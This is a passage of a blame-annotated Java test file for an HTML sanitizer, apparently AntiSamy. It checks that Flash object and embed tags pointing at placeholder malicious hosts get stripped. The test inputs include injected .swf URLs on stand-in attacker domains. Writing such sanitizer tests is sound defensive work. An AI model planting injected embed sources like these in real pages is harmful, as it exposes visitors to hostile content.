7240f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(input, expectedOutput);
7250f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    } else {
7260f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitized(input, "");
7270f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
7280f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7290f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    String saxExpectedOutput = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\"><param name=\"allowFullScreen\" value=\"true\"><param name=\"allowscriptaccess\" value=\"always\"><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>";
7300f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
7310f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(input, saxExpectedOutput);
7320f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    } else {
7330f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitized(input, "");
7340f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
7350f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7360f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // now what if someone sticks malicious URL in the value of the
7370f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // value attribute in the param tag? remove that param tag
7380f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    input = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://supermaliciouscode.com/badstuff.swf\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>";
7390f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    expectedOutput = "<object height=\"340\" width=\"560\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><embed allowfullscreen=\"true\" allowscriptaccess=\"always\" height=\"340\" src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\" type=\"application/x-shockwave-flash\" width=\"560\" /></object>";
7400f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    saxExpectedOutput = "<object width=\"560\" height=\"340\"><param name=\"allowFullScreen\" value=\"true\"><param name=\"allowscriptaccess\" value=\"always\"><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>";
7410f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
7420f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(input, expectedOutput);
7430f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    } else {
7440f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitized(input, "");
7450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
7460f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7470f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
7480f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertTrue(sanitize(input).equals(saxExpectedOutput));
7490f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    } else {
7500f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitized(input, "");
7510f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
7520f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7530f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // now what if someone sticks malicious URL in the value of the src
7540f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // attribute in the embed tag? remove that embed tag
7550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    input = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://hereswhereikeepbadcode.com/ohnoscary.swf\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>";
7560f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    expectedOutput = "<object height=\"340\" width=\"560\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\" /><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /></object>";
7570f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    saxExpectedOutput = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\"><param name=\"allowFullScreen\" value=\"true\"><param name=\"allowscriptaccess\" value=\"always\"></object>";
7580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7590f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
7600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(input, expectedOutput);
7610f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    } else {
7620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitized(input, "");
7630f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
7640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7650f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
7660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(input, saxExpectedOutput);
7670f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    } else {
7680f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitized(input, "");
7690f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
7700f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
7710f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7720f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
773be666032a113a8af92bc557add8e83579cf0ef5cmikesamuel  private static void assertSanitizedDoesNotContain(
7744e867904c8295537803c1c8a076e130df5674b58mikesamuel      String html, String dangerousContent) {
7750f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    String sanitized = sanitize(html);
7760f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    int index = Strings.toLowerCase(sanitized).indexOf(
7770f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        Strings.toLowerCase(dangerousContent));
7780f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertEquals(
7790f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        "`" + sanitized + "` from `" + html + "` contains `" +
7800f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        dangerousContent + "`",
7810f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        -1, index);
7820f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
7830f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
784be666032a113a8af92bc557add8e83579cf0ef5cmikesamuel  private static void assertSanitizedDoesContain(
7854e867904c8295537803c1c8a076e130df5674b58mikesamuel      String html, String dangerousContent) {
7860f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    String sanitized = sanitize(html);
7870f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    int index = Strings.toLowerCase(sanitized).indexOf(
7880f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        Strings.toLowerCase(dangerousContent));
7890f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertTrue(
7900f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        "`" + sanitized + "` from `" + html + "` does not contain `" +
7910f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        dangerousContent + "`",
7920f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        index >= 0);
7930f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
7940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
795be666032a113a8af92bc557add8e83579cf0ef5cmikesamuel  private static void assertSanitized(String html, String sanitized) {
7960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertEquals(sanitized, sanitize(html));
7970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
798d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel
799d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel  private static String guessCharsetFromContentType(String contentType) {
800d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel    Matcher m = Pattern.compile(";\\s*charset=(?:\"([^\"]*)\"|([^\\s;]*))")
801d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel      .matcher(contentType);
802d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel    if (m.find()) {
803d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel      String ct;
804d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel      ct = m.group(1);
805d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel      if (ct != null) { return ct; }
806d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel      ct = m.group(2);
807d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel      if (ct != null) { return ct; }
808d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel    }
809d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel    return "UTF-8";
810d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel  }
811afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com}